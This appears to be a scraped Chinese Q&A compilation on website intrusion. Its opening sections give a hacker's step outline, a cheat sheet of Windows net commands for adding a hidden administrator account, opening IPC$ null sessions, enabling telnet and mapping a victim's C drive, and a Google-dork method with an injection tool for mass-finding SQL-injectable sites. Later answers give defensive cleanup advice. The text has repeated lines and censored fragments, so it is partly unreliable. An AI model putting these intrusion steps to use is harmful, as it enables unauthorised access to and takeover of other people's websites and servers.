文章大纲：

• 1、我问下一个黑客在入侵一个网站，一般是通过什么步骤啊？
• 2、入侵网站的命令大全?
• 3、网站入侵关键字
• 4、请问怎样快速查找可以入侵的网站呢？
• 5、今天看到后台流量统计，显示有明显和我网站不相关的关键词，是否被入侵？
• 6、asp网站access数据库被入侵了，导致标题改人家的关键词，在网站后台无法查到

我问下一个黑客在入侵一个网站，一般是通过什么步骤啊？

--探测开放的服务

|--溢出

|--弱口令

|--查找敏感或者脆弱目录-分析网站目录结构

|--整站程序Bug 黑白盒测试 获取SHELL

|--nslookup 列出所有二级玉米 逐个分析

|--site:***.com 关键字 -探测弱口令

|--啊D寻找注入点-----注入

|---手工查找注入点-注入

|--拿C段机器--提权--嗅探+arp

|--收集一切能收集管理员信息 充分应用baidu google 实现社会工程序

入侵网站的命令大全?

黑客常用命令大全

net user heibai lovechina /add 加一个heibai的用户密码为lovechina

net localgroup Administrators heibai /add 把他加入Administrator组

net start telnet 开对方的TELNET服务

net use z:\127.0.0.1c$ 映射对方的C盘

net user guest /active:yes 将Guest用户激活

net user guest lovechina 把guest的密码改为lovechina

net user 查看所有用户列表

net user 用户名 /delete 删掉

net time \\127.0.0.1 得到对方的时间， get c:\index.htm d:\ 上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘

NET VIEW 显示域列表、计算机列表或指定计算机的共

计算机运行命令全集 winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

wscript--------windows脚本宿主设置

write----------写字板winmsd-----系统信息

wiaacmgr-------扫描仪和照相机向导

winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况

Msconfig.exe---系统配置实用程序

mplayer2-------简易widnows media player

mspaint--------画图板

mstsc----------远程桌面连接

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名　密码　/add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名　 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

网站入侵关键字

这是搜索你网站的服务系统，搜到的页面是网站提供的服务。要想避免这个问题，只能加强防范

请问怎样快速查找可以入侵的网站呢？

用明小子软件打开谷歌·选高级搜索·每页100条·简体中文·搜索关键字为news.asp?id=100 这个100可以随便设置数字搜索内容选 仅的网页网址中然后搜索吧·每页大概都能搜出来5-6个有注入漏洞的

今天看到后台流量统计，显示有明显和我网站不相关的关键词，是否被入侵？

这应该是恶意镜像，别人的网站指向你的ip，而且也被收录了；如果是恶意镜像，那解决办法有三种：

1、网站首页采用绝对路径

2、换ip

3、取消ip访问，采用域名访问

asp网站access数据库被入侵了，导致标题改人家的关键词，在网站后台无法查到

之一步 先把Access数据库下载下来 看看在哪些表里的哪些字段被替换成了人家的关键词

第二步 写SQL语句 把关键词清理掉

第三步 把Access数据库转成MSSQL数据库

第四步 设置MSSQL服务器权限彻底防注入 并修改网站程序里的数据库连接字符串

第五步 查看网站程序文件 看看哪个文件的修改时间是最晚 那个文件就可能是木马 或者看看那个文件个头很大 那也可能是木马 删掉 并且把该目录的写权限和可执行权限禁掉

第六步 查看网站所有目录 保证出上传目录外 其他目录都没有可写权限 上传目录 的可执行权限禁掉

本人所在公司维护服务器一般都是这几步 你试试

换SQL数据库